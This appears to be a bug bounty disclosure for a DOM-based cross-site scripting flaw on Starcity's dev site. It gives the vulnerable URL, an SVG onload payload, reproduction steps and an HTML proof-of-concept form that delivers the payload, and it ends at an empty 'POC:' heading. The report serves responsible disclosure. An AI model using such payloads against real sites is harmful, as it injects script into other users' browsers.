DOM-Based XSS on Starcity.com

  • Reported to Starcity
  • Reported by Haqtify
  • Medium (5.2)
  • $400
  • Published 5 months ago
  • No Likes

URL:

https://dev.starcity.com/communities/?region=san-francisco

Description:

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

Payload:

“><svg/onload=alert(1)>

Steps To Reproduce:

1. Goto this URL.

https://dev.starcity.com/communities/?region=san-francisco

2. Insert XSS Payload after URL.

3.XSS executed.

Final URL:

https://dev.starcity.com/communities/?region=san-francisco”><svg/onload=alert(1)>

XSS CSRF POC:

<html>
<body>
<script>history.pushState(”, ”, ‘/’)</script>
<form action=”https://dev.starcity.com/communities/”>
<input type=”hidden” name=”region” value=”san&#45;francisco&quot;&gt;&lt;svg&#47;onload&#61;alert&#40;1&#41;&gt;” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>

 

POC: